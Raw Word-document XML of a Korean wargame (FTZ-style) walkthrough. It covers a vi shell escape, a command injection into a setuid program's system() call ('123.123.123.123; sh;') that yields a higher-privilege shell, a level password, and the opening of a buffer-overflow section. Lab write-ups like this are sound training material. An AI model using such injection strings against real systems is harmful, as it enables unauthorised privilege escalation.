          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>:! [명령어] 는 vi editor</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00634ED4">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00634ED4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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00634ED4">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>실행중에</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00634ED4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다른 명령어를 실행할 수 있는 기능입니다.</w:t>
      </w:r>
      <w:r w:rsidR="00EE6280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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00634ED4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이걸로</w:t>
      </w:r>
      <w:r w:rsidRPr="00634ED4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간단히 level3 권한의 shell을 획득</w:t>
      </w:r>
      <w:r w:rsidR="00EE6280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했습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00456B38" w:rsidRPr="009A134E" w:rsidRDefault="002E52F9" w:rsidP="00456B38">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00456B38" w:rsidRPr="009A134E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 xml:space="preserve">evel3 </w:t>
      </w:r>
      <w:r w:rsidR="00456B38" w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00456B38" w:rsidRPr="009A134E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>[</w:t>
      </w:r>
      <w:r w:rsidR="00456B38" w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>system 함수의 취약점</w:t>
      </w:r>
      <w:r w:rsidR="00456B38" w:rsidRPr="009A134E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>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B7029" w:rsidRDefault="00752D57" w:rsidP="00634ED4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00752D57">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>password :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00752D57">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00752D57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>can you fly?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00752D57" w:rsidRDefault="00752D57" w:rsidP="00634ED4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00752D57" w:rsidRDefault="00AB25DC" w:rsidP="00634ED4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>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:noProof/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6438900" cy="7207377"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="그림 10" descr="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1502" cy="721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3C8" w:rsidRDefault="007843C8" w:rsidP="00634ED4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0D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D3068">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D3068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lastRenderedPageBreak/>
        <w:t>=개요=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068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마지막에</w:t>
      </w:r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system함수를 이용해서 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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>"dig @(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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[1]) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>version.bind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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chaos txt" 명령을 수행하는 것을 알 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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>system함수는 인자로 들어온 문자를 shell에서 그대로 실행해 주는 함수입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068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저</w:t>
      </w:r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명령어의 정체는 뭘까요?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D3068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리눅스에서</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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dig 명령어는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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조회를 하거나 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>서버의 정보를 알아내는데 쓰이는 명령어입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068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보통</w:t>
      </w:r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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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이라는 명령어로 간단하게 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>조회를 할 수 있는데요.</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r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dig는 더 상세한 결과를 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>원할때</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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사용합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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dig명령어는</w:t>
      </w:r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공격 이전에 dns서버에 대한 정보수집이 필요하게 된다면 자세한 옵션을 </w:t>
      </w:r>
      <w:r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살펴</w:t>
      </w:r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>보고 사용하면 됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068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일단</w:t>
      </w:r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지금은 "dig @(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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[1]) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>version.bind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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chaos txt" 를 이용해서</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> 어떻게 </w:t>
      </w:r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level4 권한의 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>쉘을</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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실행시킬 것인지에 집중하겠습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068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검색해보면</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> 해당 명령어는</w:t>
      </w:r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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>서버에 대한 bind 버전을 알아내는 명령어라고 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068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일단</w:t>
      </w:r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정상적인 사용법의 예는 다음과 같습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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>"dig @(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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서버주소) txt chaos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>version.bind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D3068">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D3068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lastRenderedPageBreak/>
        <w:t>=동시에 여러 명령어 사용=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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level4 권한의 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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쉘</w:t>
      </w:r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>을</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>얻기위해</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D3068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우리는</w:t>
      </w:r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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>[1]</w:t>
      </w:r>
      <w:r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에</w:t>
      </w:r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무언가를 입력해서 sh명령어를 실행시켜야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068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그렇다면</w:t>
      </w:r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일단 다짜고짜 /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>autodig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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123.123.123.123 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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라는 명령어를 입력해봅니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068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그러면</w:t>
      </w:r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에러가 뜹니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068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이건</w:t>
      </w:r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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>[1]</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>으로</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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123.123.123.123, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>[2]</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>로</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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가 전달된 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>형태이기때문입니다</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068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그렇다면</w:t>
      </w:r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, shell에서 명령어를 연속적으로 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>사용할때</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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이용할 수 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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>있는 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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이용해 봅시다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>autodig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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123.123.123.123;sh; 라는 명령어를 입력해봅니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068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이걸로도</w:t>
      </w:r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level4 권한의 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>쉘이</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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획득되지 않습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068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다만</w:t>
      </w:r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level3 권한의 새로운 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>쉘이</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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실행되었습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>autodig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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123.123.123.123 까지만 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>실행이되고</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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해당 프로그램이 끝난 다음에</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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명령어가 실행된 것입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068" w:rsidRPr="00F612F8" w:rsidRDefault="000D3068" w:rsidP="000D3068">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F612F8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>=문자열 형태로 명령어 전달=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068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그렇다면</w:t>
      </w:r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123.123.123.123;sh; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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하나의 인자로 묶어서 /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>autodig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>에 전달할 수 있는 방법은 뭘까요?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD5774" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068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그건</w:t>
      </w:r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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>쌍따옴표로</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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묶어서 하나의 문자열로 인자를 전달하는 방법입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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0D3068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이제</w:t>
      </w:r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/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>autodig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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"123.123.123.123; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>;"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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입력합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3068" w:rsidRPr="000D3068" w:rsidRDefault="000D3068" w:rsidP="000D306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level4 권한의 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>쉘을</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D306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얻을 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A76008" w:rsidRPr="009A134E" w:rsidRDefault="002E52F9" w:rsidP="00A76008">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00A76008" w:rsidRPr="009A134E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 xml:space="preserve">evel3 </w:t>
      </w:r>
      <w:r w:rsidR="00A76008" w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A76008" w:rsidRPr="009A134E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 xml:space="preserve">[버퍼 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A76008" w:rsidRPr="009A134E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>오버플로우</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A76008" w:rsidRPr="009A134E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>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00990EBC" w:rsidRDefault="00990EBC" w:rsidP="00990EBC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00752D57">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>password :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00752D57">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00752D57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>can you fly?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546E68" w:rsidRDefault="00546E68" w:rsidP="000D3068">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00990EBC" w:rsidRDefault="00857BC8" w:rsidP="000D3068">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6400800" cy="7164729"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="그림 11" descr="3_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2_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16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BC8" w:rsidRDefault="00857BC8" w:rsidP="000D3068">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C2126" w:rsidRPr="008C2126" w:rsidRDefault="008C2126" w:rsidP="008C2126">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2126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lastRenderedPageBreak/>
        <w:t>=개요=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C2126" w:rsidRPr="008C2126" w:rsidRDefault="008C2126" w:rsidP="008C2126">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C2126" w:rsidRPr="008C2126" w:rsidRDefault="008C2126" w:rsidP="008C2126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8C2126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level3은 버퍼 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C2126">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>오버플로우</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C2126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취약점도 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C2126" w:rsidRPr="008C2126" w:rsidRDefault="008C2126" w:rsidP="008C2126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8C2126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버퍼</w:t>
      </w:r>
      <w:r w:rsidRPr="008C2126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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C2126">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>오버플로우란</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C2126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정해진 변수의 크기보다 더 큰 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C2126">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>입력값을</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C2126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넣어서 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C2126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스택에</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C2126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위치한 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C2126">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>리턴주소</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
